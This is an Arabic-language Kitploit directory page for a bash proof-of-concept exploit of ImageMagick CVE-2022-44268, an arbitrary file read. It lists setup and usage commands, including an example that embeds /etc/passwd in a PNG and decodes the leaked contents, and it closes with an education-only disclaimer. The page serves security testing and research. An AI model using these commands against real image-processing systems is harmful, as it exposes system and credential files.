Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ImageMagick-CVE-2022-44268-PoC — نص برمجي بلغة bash لاستغلال ثغرة قراءة الملفات التعسفية في ImageMagick بسهولة CVE-2022-44268 | Kitploit
أدوات/GitHubGitHub/atici/imagemagick-cve-2022-44268-poc
تحليل الثغرات الأمنيةالاستغلالتسريب البياناتجمع المعلوماتاختبار الاختراقتطوير الحمولات
GitHubatici/imagemagick-cve-2022-44268-poc

ImageMagick-CVE-2022-44268-PoC

نص برمجي بلغة bash لاستغلال ثغرة قراءة الملفات التعسفية في ImageMagick بسهولة CVE-2022-44268

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 20 أياملم تتم المراجعة بعد

ImageMagick-CVE-2022-44268-PoC

نص برمجي بلغة bash لاستغلال ثغرة قراءة الملفات التعسفية في ImageMagick بسهولة CVE-2022-44268

إصدار Image Magic المتأثر

root@kitploit:~
Version: ImageMagick 6.9.11-60 Q16 x86_64 2021-01-25 https://imagemagick.org
Copyright: (C) 1999-2021 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC Modules OpenMP(4.5)
Delegates (built-in): bzlib djvu fftw fontconfig freetype heic jbig jng jp2 jpeg lcms lqr ltdl lzma openexr pangocairo png tiff webp wmf x xml zlib

الحزم المطلوب تثبيتها

root@kitploit:~
sudo apt-get install imagemagick exiftool pngcrush exiv2 -y

الإعداد

root@kitploit:~
git clone https://github.com/atici/Exploit-for-ImageMagick-CVE-2022-44268.git
cd Exploit-for-ImageMagick-CVE-2022-44268
chmod 750 script.sh

الاستخدام

root@kitploit:~
./script.sh -p [Path to Read] [PNG Image] [Output[Optional, if not used defaults to pngout.png]]
./script.sh -d [PNG]

Examples
./script.sh -p /etc/passwd sample.png output.png
./script.sh -d pngout.png

Options
-h = Show help
-p = Add the exploit to a PNG image 
-d = Extract and decode the read file

الاعتمادات

  • التقرير الأصلي: https://www.metabaseq.com/imagemagick-zero-days/
  • PoC الأصلي : https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC.git
  • الإلهام لهذا المشروع : https://github.com/Ashifcoder/CVE-2022-44268-automated-poc

إخلاء المسؤولية:

جميع التعليمات البرمجية المقدمة في هذا المستودع مخصصة للأغراض التعليمية/البحثية فقط. أي إجراءات و/أو أنشطة تتعلق بالمحتوى الموجود داخل هذا المستودع تقع على مسؤوليتك وحدك. يمكن أن يؤدي إساءة استخدام التعليمات البرمجية في هذا المستودع إلى توجيه تهم جنائية للأشخاص المعنيين. لن يتحمل المؤلف المسؤولية في حال تم توجيه أي تهم جنائية ضد أي أفراد يسيئون استخدام التعليمات البرمجية في هذا المستودع لخرق القانون.

تنزيل الأداة